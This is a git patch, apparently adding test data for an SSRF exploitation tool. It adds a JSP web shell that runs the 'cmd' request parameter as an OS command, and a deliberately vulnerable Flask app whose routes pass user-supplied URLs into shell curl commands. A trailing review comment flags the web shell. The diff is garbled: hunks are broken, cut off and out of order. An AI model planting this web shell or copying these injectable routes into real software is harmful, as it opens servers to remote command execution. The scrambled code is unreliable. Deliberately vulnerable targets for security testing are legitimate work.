From 49ab156d022341bd2166690b0cd9a16648038f46 Mon Sep 17 00:00:00 2001
From: Error <110461609+errorfiathck@users.noreply.github.com>
Date: Tue, 14 Nov 2023 17:29:42 +0330
Subject: [PATCH] Add files via upload
---
data/cmd.jsp | 23 +++++++++++++++++++
data/example.py | 58 +++++++++++++++++++++++++++++++++++++++++++++++
data/request.txt | 13 +++++++++++
data/request2.txt | 13 +++++++++++
data/request3.txt | 9 ++++++++
data/request4.txt | 9 ++++++++
data/request5.txt | 16 +++++++++++++
7 files changed, 141 insertions(+)
create mode 100644 data/cmd.jsp
create mode 100644 data/example.py
create mode 100644 data/request.txt
create mode 100644 data/request2.txt
create mode 100644 data/request3.txt
create mode 100644 data/request4.txt
create mode 100644 data/request5.txt
diff --git a/data/cmd.jsp b/data/cmd.jsp
new file mode 100644
index 0000000..a7d2bb7
--- /dev/null
+++ b/data/cmd.jsp
@@ -0,0 +1,23 @@
+<%@ page import="java.util.*,java.io.*"%>
+
+ ++<% +if (request.getParameter("cmd") != null) { + out.println("Command: " + request.getParameter("cmd") + "+ \ No newline at end of file diff --git a/data/example.py b/data/example.py new file mode 100644 index 0000000..ddacbba --- /dev/null +++ b/data/example.py @@ -0,0 +1,58 @@ +# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE) +# NOTE: this file should become a simple ssrf example in order to test SSRFmap +# FLASK_APP=example.py flask run + +from flask import Flask, abort, request +import json +import re +import subprocess + +app = Flask(__name__) + +@app.route("/") +def hello(): + return "SSRF Example!" + +# curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf +@app.route("/ssrf", methods=['POST']) +def ssrf(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2 +@app.route("/ssrf2", methods=['POST']) +def ssrf2(): + data = request.json + print(data) + print(data.get('url')) + content = command(f"curl {data.get('url')}") + return content + +# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" +@app.route("/ssrf3", methods=['GET']) +def ssrf3(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -X POST -H "Content-Type: application/xml" -d '
"); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } +%> +
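Review bot: The scriptlet in `data/cmd.jsp` passes `request.getParameter("cmd")` straight to `Runtime.getRuntime().exec(...)` behind nothing but a null check, and neither the file nor the commit message says why such a page is in the repository. `data/example.py` in the same commit opens with a NOTE marking it as deliberately vulnerable; if this file is test data of the same kind, give it the equivalent first line, e.g. `<%-- Deliberately vulnerable test data: runs the "cmd" request parameter as an OS command. Not a deployable page. --%>`, so that a scanner hit or a copy found in a web root can be told apart from an implanted web shell. The same parameter is also concatenated unescaped into the response by `out.println("Command: " + ...)`, which is worth naming in that comment as well. The markup lines of this hunk did not survive on the page, so the review covers only the visible scriptlet.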